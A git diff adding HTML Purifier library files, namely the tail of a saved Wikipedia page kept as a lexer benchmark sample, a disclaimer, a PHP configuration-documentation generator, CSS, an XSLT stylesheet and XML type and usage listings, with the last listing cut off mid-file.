href="/w/index.php?title=Tai_Chi_Chuan&oldid=65197836">Permanent link</a></li><li id="t-cite"><a href="/w/index.php?title=Special:Cite&page=Tai_Chi_Chuan&id=65197836">Cite this article</a></li> </ul> + + </div> + </div> + <div id="p-lang" class="portlet"> + <h5>In other languages</h5> + <div class="pBody"> + <ul> + <li class="interwiki-br"><a href="http://br.wikipedia.org/wiki/Taichichuan">Brezhoneg</a></li> + <li class="interwiki-ca"><a href="http://ca.wikipedia.org/wiki/Tai_txi_txuan">Català</a></li> + + <li class="interwiki-cs"><a href="http://cs.wikipedia.org/wiki/Tchaj-%C5%A5i">Cesky</a></li> + <li class="interwiki-da"><a href="http://da.wikipedia.org/wiki/Tai_Chi">Dansk</a></li> + <li class="interwiki-de"><a href="http://de.wikipedia.org/wiki/Taijiquan">Deutsch</a></li> + <li class="interwiki-et"><a href="http://et.wikipedia.org/wiki/Taijiquan">Eesti</a></li> + <li class="interwiki-el"><a href="http://el.wikipedia.org/wiki/%CE%A4%CE%AC%CE%B9_%CE%A4%CE%B6%CE%AF_%CE%A3%CE%BF%CF%85%CE%AC%CE%BD">????????</a></li> + <li class="interwiki-es"><a href="http://es.wikipedia.org/wiki/Tai_Chi_Chuan">Español</a></li> + + <li class="interwiki-eo"><a href="http://eo.wikipedia.org/wiki/Taj%C4%9Di%C4%89uano">Esperanto</a></li> + <li class="interwiki-fr"><a href="http://fr.wikipedia.org/wiki/Tai-chi-chuan">Français</a></li> + <li class="interwiki-it"><a href="http://it.wikipedia.org/wiki/Taijiquan">Italiano</a></li> + <li class="interwiki-he"><a href="http://he.wikipedia.org/wiki/%D7%98%D7%90%D7%99_%D7%A6%27%D7%99">?????</a></li> + <li class="interwiki-hu"><a href="http://hu.wikipedia.org/wiki/Taijiquan">Magyar</a></li> + <li class="interwiki-nl"><a href="http://nl.wikipedia.org/wiki/Tai_Chi">Nederlands</a></li> + + <li class="interwiki-ja"><a href="http://ja.wikipedia.org/wiki/%E5%A4%AA%E6%A5%B5%E6%8B%B3">???</a></li> + <li class="interwiki-pl"><a href="http://pl.wikipedia.org/wiki/Taijiquan">Polski</a></li> + <li class="interwiki-pt"><a href="http://pt.wikipedia.org/wiki/Tai_Chi_Chuan">Português</a></li> + <li class="interwiki-ro"><a href="http://ro.wikipedia.org/wiki/Taijiquan">Româna</a></li> + <li class="interwiki-ru"><a href="http://ru.wikipedia.org/wiki/%D0%A2%D0%B0%D0%B9%D1%86%D0%B7%D0%B8%D1%86%D1%8E%D0%B0%D0%BD%D1%8C">???????</a></li> + <li class="interwiki-fi"><a href="http://fi.wikipedia.org/wiki/Taijiquan">Suomi</a></li> + + <li class="interwiki-sv"><a href="http://sv.wikipedia.org/wiki/Taijiquan">Svenska</a></li> + <li class="interwiki-th"><a href="http://th.wikipedia.org/wiki/%E0%B9%84%E0%B8%97%E0%B9%88%E0%B9%80%E0%B8%81%E0%B9%8A%E0%B8%81">???</a></li> + <li class="interwiki-tr"><a href="http://tr.wikipedia.org/wiki/Tai-Chi_Chuan">Türkçe</a></li> + <li class="interwiki-zh"><a href="http://zh.wikipedia.org/wiki/%E5%A4%AA%E6%9E%81%E6%8B%B3">??</a></li> + </ul> + </div> + </div> + + </div><!-- end of the left (by default at least) column --> + <div class="visualClear"></div> + <div id="footer"> + <div id="f-poweredbyico"><a href="http://www.mediawiki.org/"><img src="/skins-1.5/common/images/poweredby_mediawiki_88x31.png" alt="MediaWiki" /></a></div> + <div id="f-copyrightico"><a href="http://wikimediafoundation.org/"><img src="/images/wikimedia-button.png" border="0" alt="Wikimedia Foundation"/></a></div> + <ul id="f-list"> + <li id="lastmod"> This page was last modified 03:15, July 22, 2006.</li> + <li id="copyright">All text is available under the terms of the <a class='internal' href="/wiki/Wikipedia:Text_of_the_GNU_Free_Documentation_License" title="Wikipedia:Text of the GNU Free Documentation License">GNU Free Documentation License</a>. (See <b><a class='internal' href="/wiki/Wikipedia:Copyrights" title="Wikipedia:Copyrights">Copyrights</a></b> for details.) <br /> Wikipedia® is a registered trademark of the Wikimedia Foundation, Inc.<br /></li> + + <li id="privacy"><a href="http://wikimediafoundation.org/wiki/Privacy_policy" title="wikimedia:Privacy policy">Privacy policy</a></li> + <li id="about"><a href="/wiki/Wikipedia:About" title="Wikipedia:About">About Wikipedia</a></li> + <li id="disclaimer"><a href="/wiki/Wikipedia:General_disclaimer" title="Wikipedia:General disclaimer">Disclaimers</a></li> + </ul> + </div> + <script type="text/javascript"> if (window.runOnloadHook) runOnloadHook();</script> +</div> + +<!-- Served by srv25 in 0.089 secs. --> +</body></html> + +<!-- vim: et sw=4 sts=4 +--> diff --git a/lib/htmlpurifier/benchmarks/samples/Lexer/DISCLAIMER.txt b/lib/htmlpurifier/benchmarks/samples/Lexer/DISCLAIMER.txt new file mode 100644 index 000000000..0c8ae5d93 --- /dev/null +++ b/lib/htmlpurifier/benchmarks/samples/Lexer/DISCLAIMER.txt @@ -0,0 +1,7 @@ +Disclaimer: + +The HTML used in these samples are taken from random websites. I claim +no copyright over these and assert that I may use them like this under +fair use. + + vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/configdoc/generate.php b/lib/htmlpurifier/configdoc/generate.php new file mode 100644 index 000000000..e0c4e674a --- /dev/null +++ b/lib/htmlpurifier/configdoc/generate.php @@ -0,0 +1,64 @@ +<?php + +/** + * Generates XML and HTML documents describing configuration. + * @note PHP 5.2+ only! + */ + +/* +TODO: +- make XML format richer +- extend XSLT transformation (see the corresponding XSLT file) +- allow generation of packaged docs that can be easily moved +- multipage documentation +- determine how to multilingualize +- add blurbs to ToC +*/ + +if (version_compare(PHP_VERSION, '5.2', '<')) exit('PHP 5.2+ required.'); +error_reporting(E_ALL | E_STRICT); + +// load dual-libraries +require_once dirname(__FILE__) . '/../extras/HTMLPurifierExtras.auto.php'; +require_once dirname(__FILE__) . '/../library/HTMLPurifier.auto.php'; + +// setup HTML Purifier singleton +HTMLPurifier::getInstance(array( + 'AutoFormat.PurifierLinkify' => true +)); + +$builder = new HTMLPurifier_ConfigSchema_InterchangeBuilder(); +$interchange = new HTMLPurifier_ConfigSchema_Interchange(); +$builder->buildDir($interchange); +$loader = dirname(__FILE__) . '/../config-schema.php'; +if (file_exists($loader)) include $loader; +$interchange->validate(); + +$style = 'plain'; // use $_GET in the future, careful to validate! +$configdoc_xml = dirname(__FILE__) . '/configdoc.xml'; + +$xml_builder = new HTMLPurifier_ConfigSchema_Builder_Xml(); +$xml_builder->openURI($configdoc_xml); +$xml_builder->build($interchange); +unset($xml_builder); // free handle + +$xslt = new ConfigDoc_HTMLXSLTProcessor(); +$xslt->importStylesheet(dirname(__FILE__) . "/styles/$style.xsl"); +$output = $xslt->transformToHTML($configdoc_xml); + +if (!$output) { + echo "Error in generating files\n"; + exit(1); +} + +// write out +file_put_contents(dirname(__FILE__) . "/$style.html", $output); + +if (php_sapi_name() != 'cli') { + // output (instant feedback if it's a browser) + echo $output; +} else { + echo "Files generated successfully.\n"; +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/configdoc/styles/plain.css b/lib/htmlpurifier/configdoc/styles/plain.css new file mode 100644 index 000000000..7af80d061 --- /dev/null +++ b/lib/htmlpurifier/configdoc/styles/plain.css @@ -0,0 +1,44 @@ + +body {margin:0;padding:0;} +#content { + margin:1em auto; + max-width: 47em; + width: expression(document.body.clientWidth > + 85 * parseInt(document.body.currentStyle.fontSize) ? + "54em": "auto"); +} + +table {border-collapse:collapse;} +table td, table th {padding:0.2em;} + +table.constraints {margin:0 0 1em;} +table.constraints th { + text-align:right;padding-left:0.4em;padding-right:0.4em;background:#EEE; + width:8em;vertical-align:top;} +table.constraints td {padding-right:0.4em; padding-left: 1em;} +table.constraints td ul {padding:0; margin:0; list-style:none;} +table.constraints td pre {margin:0;} + +#tocContainer {position:relative;} +#toc {list-style-type:none; font-weight:bold; font-size:1em; margin-bottom:1em;} +#toc li {position:relative; line-height: 1.2em;} +#toc .col-2 {margin-left:50%;} +#toc .col-l {float:left;} +#toc ul {list-style-type:disc; font-weight:normal; padding-bottom:1.2em;} + +.description p {margin-top:0;margin-bottom:1em;} + +#library, h1 {text-align:center; font-family:Garamond, serif; + font-variant:small-caps;} +#library {font-size:1em;} +h1 {margin-top:0;} +h2 {border-bottom:1px solid #CCC; font-family:sans-serif; font-weight:normal; + font-size:1.3em; clear:both;} +h3 {font-family:sans-serif; font-size:1.1em; font-weight:bold; } +h4 {font-family:sans-serif; font-size:0.9em; font-weight:bold; } + +.deprecated {color: #CCC;} +.deprecated table.constraints th {background:#FFF;} +.deprecated-notice {color: #000; text-align:center; margin-bottom: 1em;} + +/* vim: et sw=4 sts=4 */ diff --git a/lib/htmlpurifier/configdoc/styles/plain.xsl b/lib/htmlpurifier/configdoc/styles/plain.xsl new file mode 100644 index 000000000..9b9794e0b --- /dev/null +++ b/lib/htmlpurifier/configdoc/styles/plain.xsl @@ -0,0 +1,253 @@ +<?xml version="1.0" encoding="UTF-8"?> +<xsl:stylesheet + version = "1.0" + xmlns = "http://www.w3.org/1999/xhtml" + xmlns:xsl = "http://www.w3.org/1999/XSL/Transform" +> + <xsl:output + method = "xml" + encoding = "UTF-8" + doctype-public = "-//W3C//DTD XHTML 1.0 Transitional//EN" + doctype-system = "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" + indent = "no" + media-type = "text/html" + /> + <xsl:param name="css" select="'styles/plain.css'"/> + <xsl:param name="title" select="'Configuration Documentation'"/> + + <xsl:variable name="typeLookup" select="document('../types.xml')/types" /> + <xsl:variable name="usageLookup" select="document('../usage.xml')/usage" /> + + <!-- Twiddle this variable to get the columns as even as possible --> + <xsl:variable name="maxNumberAdjust" select="2" /> + + <xsl:template match="/"> + <html lang="en" xml:lang="en"> + <head> + <title><xsl:value-of select="$title" /> - <xsl:value-of select="/configdoc/title" /></title> + <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" /> + <link rel="stylesheet" type="text/css" href="{$css}" /> + </head> + <body> + <div id="content"> + <div id="library"><xsl:value-of select="/configdoc/title" /></div> + <h1><xsl:value-of select="$title" /></h1> + <div id="tocContainer"> + <h2>Table of Contents</h2> + <ul id="toc"> + <xsl:apply-templates mode="toc"> + <xsl:with-param name="overflowNumber" select="round(count(/configdoc/namespace) div 2) + $maxNumberAdjust" /> + </xsl:apply-templates> + </ul> + </div> + <div id="typesContainer"> + <h2>Types</h2> + <xsl:apply-templates select="$typeLookup" mode="types" /> + </div> + <xsl:apply-templates /> + </div> + </body> + </html> + </xsl:template> + + <xsl:template match="type" mode="types"> + <div class="type-block"> + <xsl:attribute name="id">type-<xsl:value-of select="@id" /></xsl:attribute> + <h3><code><xsl:value-of select="@id" /></code>: <xsl:value-of select="@name" /></h3> + <div class="type-description"> + <xsl:copy-of xmlns:xhtml="http://www.w3.org/1999/xhtml" select="xhtml:div/node()" /> + </div> + </div> + </xsl:template> + + <xsl:template match="title" mode="toc" /> + <xsl:template match="namespace" mode="toc"> + <xsl:param name="overflowNumber" /> + <xsl:variable name="number"><xsl:number level="single" /></xsl:variable> + <xsl:variable name="directiveNumber"><xsl:number level="any" count="directive" /></xsl:variable> + <xsl:if test="count(directive)>0"> + <li> + <!-- BEGIN multicolumn code --> + <xsl:if test="$number >= $overflowNumber"> + <xsl:attribute name="class">col-2</xsl:attribute> + </xsl:if> + <xsl:if test="$number = $overflowNumber"> + <xsl:attribute name="style">margin-top:-<xsl:value-of select="($number * 2 + $directiveNumber - 3) * 1.2" />em</xsl:attribute> + </xsl:if> + <!-- END multicolumn code --> + <a href="#{@id}"><xsl:value-of select="name" /></a> + <ul> + <xsl:apply-templates select="directive" mode="toc"> + <xsl:with-param name="overflowNumber" select="$overflowNumber" /> + </xsl:apply-templates> + </ul> + <xsl:if test="$number + 1 = $overflowNumber"> + <div class="col-l" /> + </xsl:if> + </li> + </xsl:if> + </xsl:template> + <xsl:template match="directive" mode="toc"> + <xsl:variable name="number"> + <xsl:number level="any" count="directive|namespace" /> + </xsl:variable> + <xsl:if test="not(deprecated)"> + <li> + <a href="#{@id}"><xsl:value-of select="name" /></a> + </li> + </xsl:if> + </xsl:template> + + <xsl:template match="title" /> + + <xsl:template match="namespace"> + <div class="namespace"> + <xsl:apply-templates /> + <xsl:if test="count(directive)=0"> + <p>No configuration directives defined for this namespace.</p> + </xsl:if> + </div> + </xsl:template> + <xsl:template match="namespace/name"> + <h2 id="{../@id}"><xsl:value-of select="." /></h2> + </xsl:template> + <xsl:template match="namespace/description"> + <div class="description"> + <xsl:copy-of xmlns:xhtml="http://www.w3.org/1999/xhtml" select="xhtml:div/node()" /> + </div> + </xsl:template> + + <xsl:template match="directive"> + <div> + <xsl:attribute name="class"><!-- + -->directive<!-- + --><xsl:if test="deprecated"> deprecated</xsl:if><!-- + --></xsl:attribute> + <xsl:apply-templates> + <xsl:with-param name="id" select="@id" /> + </xsl:apply-templates> + </div> + </xsl:template> + <xsl:template match="directive/name"> + <xsl:param name="id" /> + <xsl:apply-templates select="../aliases/alias" mode="anchor" /> + <h3 id="{$id}"><xsl:value-of select="$id" /></h3> + </xsl:template> + <xsl:template match="alias" mode="anchor"> + <a id="{.}"></a> + </xsl:template> + + <!-- Do not pass through --> + <xsl:template match="alias"></xsl:template> + + <xsl:template match="directive/constraints"> + <xsl:param name="id" /> + <table class="constraints"> + <xsl:apply-templates /> + <xsl:if test="../aliases/alias"> + <xsl:apply-templates select="../aliases" mode="constraints" /> + </xsl:if> + <xsl:apply-templates select="$usageLookup/directive[@id=$id]" /> + </table> + </xsl:template> + <xsl:template match="directive/aliases" mode="constraints"> + <tr> + <th>Aliases</th> + <td> + <xsl:for-each select="alias"> + <xsl:if test="position()>1">, </xsl:if> + <xsl:value-of select="." /> + </xsl:for-each> + </td> + </tr> + </xsl:template> + <xsl:template match="directive/description"> + <div class="description"> + <xsl:copy-of xmlns:xhtml="http://www.w3.org/1999/xhtml" select="xhtml:div/node()" /> + </div> + </xsl:template> + <xsl:template match="directive/deprecated"> + <div class="deprecated-notice"> + <strong>Warning:</strong> + This directive was deprecated in version <xsl:value-of select="version" />. + <a href="#{use}">%<xsl:value-of select="use" /></a> should be used instead. + </div> + </xsl:template> + <xsl:template match="usage/directive"> + <tr> + <th>Used in</th> + <td> + <ul> + <xsl:apply-templates /> + </ul> + </td> + </tr> + </xsl:template> + <xsl:template match="usage/directive/file"> + <li> + <em><xsl:value-of select="@name" /></em> on line<xsl:if test="count(line)>1">s</xsl:if> + <xsl:text> </xsl:text> + <xsl:for-each select="line"> + <xsl:if test="position()>1">, </xsl:if> + <xsl:value-of select="." /> + </xsl:for-each> + </li> + </xsl:template> + + <xsl:template match="constraints/version"> + <tr> + <th>Version added</th> + <td><xsl:value-of select="." /></td> + </tr> + </xsl:template> + <xsl:template match="constraints/type"> + <tr> + <th>Type</th> + <td> + <xsl:variable name="type" select="text()" /> + <xsl:attribute name="class">type type-<xsl:value-of select="$type" /></xsl:attribute> + <a> + <xsl:attribute name="href">#type-<xsl:value-of select="$type" /></xsl:attribute> + <xsl:value-of select="$typeLookup/type[@id=$type]/@name" /> + <xsl:if test="@allow-null='yes'"> + (or null) + </xsl:if> + </a> + </td> + </tr> + </xsl:template> + <xsl:template match="constraints/allowed"> + <tr> + <th>Allowed values</th> + <td> + <xsl:for-each select="value"><!-- + --><xsl:if test="position()>1">, </xsl:if> + "<xsl:value-of select="." />"<!-- + --></xsl:for-each> + </td> + </tr> + </xsl:template> + <xsl:template match="constraints/default"> + <tr> + <th>Default</th> + <td><pre><xsl:value-of select="." xml:space="preserve" /></pre></td> + </tr> + </xsl:template> + <xsl:template match="constraints/external"> + <tr> + <th>External deps</th> + <td> + <ul> + <xsl:apply-templates /> + </ul> + </td> + </tr> + </xsl:template> + <xsl:template match="constraints/external/project"> + <li><xsl:value-of select="." /></li> + </xsl:template> + +</xsl:stylesheet> + +<!-- vim: et sw=4 sts=4 +--> diff --git a/lib/htmlpurifier/configdoc/types.xml b/lib/htmlpurifier/configdoc/types.xml new file mode 100644 index 000000000..ee2c945a1 --- /dev/null +++ b/lib/htmlpurifier/configdoc/types.xml @@ -0,0 +1,69 @@ +<?xml version="1.0" encoding="UTF-8"?> +<types> + <type id="string" name="String"><div xmlns="http://www.w3.org/1999/xhtml"> + A <a + href="http://docs.php.net/manual/en/language.types.string.php">sequence + of characters</a>. + </div></type> + <type id="istring" name="Case-insensitive string"><div xmlns="http://www.w3.org/1999/xhtml"> + A series of case-insensitive characters. Internally, upper-case + ASCII characters will be converted to lower-case. + </div></type> + <type id="text" name="Text"><div xmlns="http://www.w3.org/1999/xhtml"> + A series of characters that may contain newlines. Text tends to + indicate human-oriented text, as opposed to a machine format. + </div></type> + <type id="itext" name="Case-insensitive text"><div xmlns="http://www.w3.org/1999/xhtml"> + A series of case-insensitive characters that may contain newlines. + </div></type> + <type id="int" name="Integer"><div xmlns="http://www.w3.org/1999/xhtml"> + An <a + href="http://docs.php.net/manual/en/language.types.integer.php"> + integer</a>. You are alternatively permitted to pass a string of + digits instead, which will be cast to an integer using + <code>(int)</code>. + </div></type> + <type id="float" name="Float"><div xmlns="http://www.w3.org/1999/xhtml"> + A <a href="http://docs.php.net/manual/en/language.types.float.php"> + floating point number</a>. You are alternatively permitted to + pass a numeric string (as defined by <code>is_numeric()</code>), + which will be cast to a float using <code>(float)</code>. + </div></type> + <type id="bool" name="Boolean"><div xmlns="http://www.w3.org/1999/xhtml"> + A <a + href="http://docs.php.net/manual/en/language.types.boolean.php">boolean</a>. + You are alternatively permitted to pass an integer <code>0</code> or + <code>1</code> (other integers are not permitted) or a string + <code>"on"</code>, <code>"true"</code> or <code>"1"</code> for + <code>true</code>, and <code>"off"</code>, <code>"false"</code> or + <code>"0"</code> for <code>false</code>. + </div></type> + <type id="lookup" name="Lookup array"><div xmlns="http://www.w3.org/1999/xhtml"> + An array whose values are <code>true</code>, e.g. <code>array('key' + => true, 'key2' => true)</code>. You are alternatively permitted + to pass an array list of the keys <code>array('key', 'key2')</code> + or a comma-separated string of keys <code>"key, key2"</code>. If + you pass an array list of values, ensure that your values are + strictly numerically indexed: <code>array('key1', 2 => + 'key2')</code> will not do what you expect and emits a warning. + </div></type> + <type id="list" name="Array list"><div xmlns="http://www.w3.org/1999/xhtml"> + An array which has consecutive integer indexes, e.g. + <code>array('val1', 'val2')</code>. You are alternatively permitted + to pass a comma-separated string of keys <code>"val1, val2"</code>. + If your array is not in this form, <code>array_values</code> is run + on the array and a warning is emitted. + </div></type> + <type id="hash" name="Associative array"><div xmlns="http://www.w3.org/1999/xhtml"> + An array which is a mapping of keys to values, e.g. + <code>array('key1' => 'val1', 'key2' => 'val2')</code>. You are + alternatively permitted to pass a comma-separated string of + key-colon-value strings, e.g. <code>"key1: val1, key2: val2"</code>. + </div></type> + <type id="mixed" name="Mixed"><div xmlns="http://www.w3.org/1999/xhtml"> + An arbitrary PHP value of any type. + </div></type> +</types> + +<!-- vim: et sw=4 sts=4 +--> diff --git a/lib/htmlpurifier/configdoc/usage.xml b/lib/htmlpurifier/configdoc/usage.xml new file mode 100644 index 000000000..1c77b8f4e --- /dev/null +++ b/lib/htmlpurifier/configdoc/usage.xml @@ -0,0 +1,534 @@ +<?xml version="1.0" encoding="UTF-8"?> +<usage> + <directive id="Core.CollectErrors"> + <file name="HTMLPurifier.php"> + <line>131</line> + </file> + <file name="HTMLPurifier/Lexer.php"> + <line>81</line> + <line>284</line> + </file> + <file name="HTMLPurifier/Lexer/DirectLex.php"> + <line>53</line> + <line>73</line> + <line>348</line> + </file> + <file name="HTMLPurifier/Strategy/RemoveForeignElements.php"> + <line>50</line> + </file> + </directive> + <directive id="CSS.MaxImgLength"> + <file name="HTMLPurifier/CSSDefinition.php"> + <line>157</line> + </file> + </directive> + <directive id="CSS.Proprietary"> + <file name="HTMLPurifier/CSSDefinition.php"> + <line>214</line> + </file> + </directive> + <directive id="CSS.AllowTricky"> + <file name="HTMLPurifier/CSSDefinition.php"> + <line>218</line> + </file> + </directive> + <directive id="CSS.Trusted"> + <file name="HTMLPurifier/CSSDefinition.php"> + <line>222</line> + </file> + </directive> + <directive id="CSS.AllowImportant"> + <file name="HTMLPurifier/CSSDefinition.php"> + <line>226</line> + </file> + </directive> + <directive id="CSS.AllowedProperties"> + <file name="HTMLPurifier/CSSDefinition.php"> + <line>296</line> + </file> + </directive> + <directive id="CSS.ForbiddenProperties"> + <file name="HTMLPurifier/CSSDefinition.php"> + <line>310</line> + </file> + </directive> + <directive id="Cache.DefinitionImpl"> + <file name="HTMLPurifier/DefinitionCacheFactory.php"> + <line>49</line> + </file> + </directive> + <directive id="HTML.Doctype"> + <file name="HTMLPurifier/DoctypeRegistry.php"> + <line>83</line> + </file> + </directive> + <directive id="HTML.CustomDoctype"> + <file name="HTMLPurifier/DoctypeRegistry.php"> + <line>85</line> + </file> + </directive> + <directive id="HTML.XHTML"> + <file name="HTMLPurifier/DoctypeRegistry.php"> + <line>88</line> + </file> + </directive> + <directive id="HTML.Strict"> + <file name="HTMLPurifier/DoctypeRegistry.php"> + <line>93</line> + </file> + </directive> + <directive id="Core.Encoding"> + <file name="HTMLPurifier/Encoder.php"> + <line>337</line> + <line>367</line> + </file> + </directive> + <directive id="Test.ForceNoIconv"> + <file name="HTMLPurifier/Encoder.php"> + <line>341</line> + <line>374</line> + </file> + </directive> + <directive id="Core.EscapeNonASCIICharacters"> + <file name="HTMLPurifier/Encoder.php"> + <line>368</line> + </file> + </directive> + <directive id="Output.CommentScriptContents"> + <file name="HTMLPurifier/Generator.php"> + <line>61</line> + </file> + </directive> + <directive id="Output.FixInnerHTML"> + <file name="HTMLPurifier/Generator.php"> + <line>62</line> + </file> + </directive> + <directive id="Output.SortAttr"> + <file name="HTMLPurifier/Generator.php"> + <line>63</line> + </file> + </directive> + <directive id="Output.FlashCompat"> + <file name="HTMLPurifier/Generator.php"> + <line>64</line> + </file> + </directive> + <directive id="Output.TidyFormat"> + <file name="HTMLPurifier/Generator.php"> + <line>93</line> + </file> + </directive> + <directive id="Core.NormalizeNewlines"> + <file name="HTMLPurifier/Generator.php"> + <line>107</line> + </file> + <file name="HTMLPurifier/Lexer.php"> + <line>266</line> + </file> + </directive> + <directive id="Output.Newline"> + <file name="HTMLPurifier/Generator.php"> + <line>108</line> + </file> + </directive> + <directive id="HTML.BlockWrapper"> + <file name="HTMLPurifier/HTMLDefinition.php"> + <line>222</line> + </file> + </directive> + <directive id="HTML.Parent"> + <file name="HTMLPurifier/HTMLDefinition.php"> + <line>230</line> + </file> + </directive> + <directive id="HTML.AllowedElements"> + <file name="HTMLPurifier/HTMLDefinition.php"> + <line>247</line> + </file> + </directive> + <directive id="HTML.AllowedAttributes"> + <file name="HTMLPurifier/HTMLDefinition.php"> + <line>248</line> + </file> + </directive> + <directive id="HTML.Allowed"> + <file name="HTMLPurifier/HTMLDefinition.php"> + <line>251</line> + </file> + </directive> + <directive id="HTML.ForbiddenElements"> + <file name="HTMLPurifier/HTMLDefinition.php"> + <line>342</line> + </file> + </directive> + <directive id="HTML.ForbiddenAttributes"> + <file name="HTMLPurifier/HTMLDefinition.php"> + <line>343</line> + </file> + </directive> + <directive id="HTML.Trusted"> + <file name="HTMLPurifier/HTMLModuleManager.php"> + <line>204</line> + </file> + <file name="HTMLPurifier/Lexer.php"> + <line>271</line> + </file> + <file name="HTMLPurifier/HTMLModule/Image.php"> + <line>27</line> + </file> + <file name="HTMLPurifier/Lexer/DirectLex.php"> + <line>36</line> + </file> + <file name="HTMLPurifier/Strategy/RemoveForeignElements.php"> + <line>23</line> + </file> + </directive> + <directive id="HTML.AllowedModules"> + <file name="HTMLPurifier/HTMLModuleManager.php"> + <line>211</line> + </file> + </directive> + <directive id="HTML.CoreModules"> + <file name="HTMLPurifier/HTMLModuleManager.php"> + <line>212</line> + </file> + </directive> + <directive id="HTML.Proprietary"> + <file name="HTMLPurifier/HTMLModuleManager.php"> + <line>222</line> + </file> + </directive> + <directive id="HTML.SafeObject"> + <file name="HTMLPurifier/HTMLModuleManager.php"> + <line>225</line> + </file> + </directive> + <directive id="HTML.SafeEmbed"> + <file name="HTMLPurifier/HTMLModuleManager.php"> + <line>228</line> + </file> + </directive> + <directive id="HTML.Nofollow"> + <file name="HTMLPurifier/HTMLModuleManager.php"> + <line>231</line> + </file> + </directive> + <directive id="HTML.TargetBlank"> + <file name="HTMLPurifier/HTMLModuleManager.php"> + <line>234</line> + </file> + </directive> + <directive id="Attr.IDBlacklist"> + <file name="HTMLPurifier/IDAccumulator.php"> + <line>26</line> + </file> + </directive> + <directive id="Core.Language"> + <file name="HTMLPurifier/LanguageFactory.php"> + <line>88</line> + </file> + </directive> + <directive id="Core.LexerImpl"> + <file name="HTMLPurifier/Lexer.php"> + <line>76</line> + </file> + </directive> + <directive id="Core.MaintainLineNumbers"> + <file name="HTMLPurifier/Lexer.php"> + <line>80</line> + </file> + <file name="HTMLPurifier/Lexer/DirectLex.php"> + <line>48</line> + </file> + </directive> + <directive id="Core.ConvertDocumentToFragment"> + <file name="HTMLPurifier/Lexer.php"> + <line>282</line> + </file> + </directive> + <directive id="Core.RemoveProcessingInstructions"> + <file name="HTMLPurifier/Lexer.php"> + <line>303</line> + </file> + </directive> + <directive id="URI."> + <file name="HTMLPurifier/URIDefinition.php"> + <line>59</line> + </file> + <file name="HTMLPurifier/URIFilter/Munge.php"> + <line>12</line> + </file> + </directive> + <directive id="URI.Host"> + <file name="HTMLPurifier/URIDefinition.php"> + <line>69</line> + </file> + <file name="HTMLPurifier/URIScheme.php"> + <line>81</line> + </file> + </directive> + <directive id="URI.Base"> + <file name="HTMLPurifier/URIDefinition.php"> + <line>70</line> + </file> + </directive> + <directive id="URI.DefaultScheme"> + <file name="HTMLPurifier/URIDefinition.php"> + <line>77</line> + </file> + </directive> + <directive id="URI.AllowedSchemes"> + <file name="HTMLPurifier/URISchemeRegistry.php"> + <line>41</line> + </file> + </directive> + <directive id="URI.OverrideAllowedSchemes"> + <file name="HTMLPurifier/URISchemeRegistry.php"> + <line>42</line> + </file> + </directive> + <directive id="URI.Disable"> + <file name="HTMLPurifier/AttrDef/URI.php"> + <line>28</line> + </file> + </directive> + <directive id="Core.ColorKeywords"> + <file name="HTMLPurifier/AttrDef/CSS/Color.php"> + <line>12</line> + </file> + <file name="HTMLPurifier/AttrDef/HTML/Color.php"> + <line>12</line> + </file> + </directive> + <directive id="CSS.AllowedFonts"> + <file name="HTMLPurifier/AttrDef/CSS/FontFamily.php"> + <line>50</line> + </file> + </directive> + <directive id="Attr.AllowedClasses"> + <file name="HTMLPurifier/AttrDef/HTML/Class.php"> + <line>18</line> + </file> + </directive> + <directive id="Attr.ForbiddenClasses"> + <file name="HTMLPurifier/AttrDef/HTML/Class.php"> + <line>19</line> + </file> + </directive> + <directive id="Attr.AllowedFrameTargets"> + <file name="HTMLPurifier/AttrDef/HTML/FrameTarget.php"> + <line>15</line> + </file> + </directive> + <directive id="Attr.EnableID"> + <file name="HTMLPurifier/AttrDef/HTML/ID.php"> + <line>30</line> + </file> + </directive> + <directive id="Attr.IDPrefix"> + <file name="HTMLPurifier/AttrDef/HTML/ID.php"> + <line>36</line> + </file> + </directive> + <directive id="Attr.IDPrefixLocal"> + <file name="HTMLPurifier/AttrDef/HTML/ID.php"> + <line>38</line> + <line>41</line> + </file> + </directive> + <directive id="Attr.IDBlacklistRegexp"> + <file name="HTMLPurifier/AttrDef/HTML/ID.php"> + <line>64</line> + </file> + </directive> + <directive id="Attr."> + <file name="HTMLPurifier/AttrDef/HTML/LinkTypes.php"> + <line>30</line> + </file> + </directive> + <directive id="Core.EnableIDNA"> + <file name="HTMLPurifier/AttrDef/URI/Host.php"> + <line>67</line> + </file> + </directive> + <directive id="Attr.DefaultTextDir"> + <file name="HTMLPurifier/AttrTransform/BdoDir.php"> + <line>13</line> + </file> + </directive> + <directive id="Core.RemoveInvalidImg"> + <file name="HTMLPurifier/AttrTransform/ImgRequired.php"> + <line>18</line> + </file> + <file name="HTMLPurifier/Strategy/RemoveForeignElements.php"> + <line>20</line> + </file> + </directive> + <directive id="Attr.DefaultInvalidImage"> + <file name="HTMLPurifier/AttrTransform/ImgRequired.php"> + <line>19</line> + </file> + </directive> + <directive id="Attr.DefaultImageAlt"> + <file name="HTMLPurifier/AttrTransform/ImgRequired.php"> + <line>25</line> + </file> + </directive> + <directive id="Attr.DefaultInvalidImageAlt"> + <file name="HTMLPurifier/AttrTransform/ImgRequired.php"> + <line>33</line> + </file> + </directive> + <directive id="HTML.Attr.Name.UseCDATA"> + <file name="HTMLPurifier/AttrTransform/Name.php"> + <line>11</line> + </file> + <file name="HTMLPurifier/HTMLModule/Name.php"> + <line>13</line> + </file> + </directive> + <directive id="HTML.FlashAllowFullScreen"> + <file name="HTMLPurifier/AttrTransform/SafeParam.php"> + <line>38</line> + </file> + </directive> + <directive id="Core.EscapeInvalidChildren"> + <file name="HTMLPurifier/ChildDef/Required.php"> + <line>62</line> + </file> + </directive> + <directive id="Cache.SerializerPath"> + <file name="HTMLPurifier/DefinitionCache/Serializer.php"> + <line>91</line> + </file> + </directive> + <directive id="Cache.SerializerPermissions"> + <file name="HTMLPurifier/DefinitionCache/Serializer.php"> + <line>107</line> + <line>124</line> + </file> + </directive> + <directive id="Filter.ExtractStyleBlocks.TidyImpl"> + <file name="HTMLPurifier/Filter/ExtractStyleBlocks.php"> + <line>54</line> + </file> + </directive> + <directive id="Filter.ExtractStyleBlocks.Scope"> + <file name="HTMLPurifier/Filter/ExtractStyleBlocks.php"> + <line>78</line> + </file> + </directive> + <directive id="Filter.ExtractStyleBlocks.Escaping"> + <file name="HTMLPurifier/Filter/ExtractStyleBlocks.php"> 